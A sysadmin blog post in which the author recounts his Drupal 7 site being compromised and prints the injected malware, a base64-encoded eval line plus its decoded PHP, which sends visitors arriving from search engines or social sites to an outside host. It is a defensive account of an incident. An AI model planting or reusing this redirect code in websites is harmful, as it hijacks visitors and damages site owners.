{TheLab}

Sylvain Artois weblog | Writing to computer

NEW VERSION - BETA
×

Stay in touch

×

Sys-admin

Securing my Ubuntu Drupal install

  • Nov 20, 2011

Recently, my Drupal 7 has been compromised: most PHP files in /sites/all (the directory where Drupal store user modules and themes) have been modified and fed with that string:


eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwogJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKICRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsKJHVhZz0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107CiBpZiAoJHVhZykgewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CiBpZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewogaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Byc25icmsub3NhLnBsLyIpOwogZXhpdCgpOwogfQogfQp9Cgl9"));

Here is the obfuscated code:


error_reporting(0);
$qazplm=headers_sent();
if( ! $qazplm ) {
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if( $uag ) {
        if( stristr( $referer,"yandex") or stristr( $referer,"yahoo" ) or stristr( $referer,"google" ) or stristr( $referer,"bing" ) or stristr( $referer,"rambler" ) or stristr( $referer,"gogo" )
             or stristr( $referer,"live.com" ) or stristr( $referer,"aport" ) or stristr( $referer,"nigma" ) or stristr( $referer,"webalta" ) or stristr( $referer,"baidu.com" )
             or stristr( $referer,"doubleclick.net" ) or stristr( $referer,"begun.ru" ) or stristr( $referer,"stumbleupon.com" ) or stristr( $referer,"bit.ly" ) or stristr( $referer,"tinyurl.com" )
             or stristr( $referer,"clickbank.net" ) or stristr( $referer,"blogspot.com" ) or stristr( $referer,"myspace.com" ) or stristr( $referer,"facebook.com" ) or stristr( $referer,"aol.com" ) ) {
            if( ! stristr( $referer,"cache" ) or ! stristr( $referer,"inurl" ) ){
                header("Location: http://prsnbrk.osa.pl/");
                exit();
            }
        }
    }
}

This code test the referer, and if it holds a well known site (facebook, yahoo, google, ...), it redirects the user to http://prsnbrk.osa.pl/. But if you directly type the url, you see nothing. So, if someone search for my site on Google, it will be redirected... Viciously effective...

My 1&1 server was more a dev platform (athome-training.com ...) than a true production ready server. Security was not a priority, and violate my server had to be a pleasure ... Obviously, I did not care to properly manage my log files, making forensic analysis impossible ...

I did so a factory reset, rebuild everything from the ground, reading as much as I can, and taking notes about what I do. Here is the account of my road to security... If you see something wrong, please, comment ;)

read more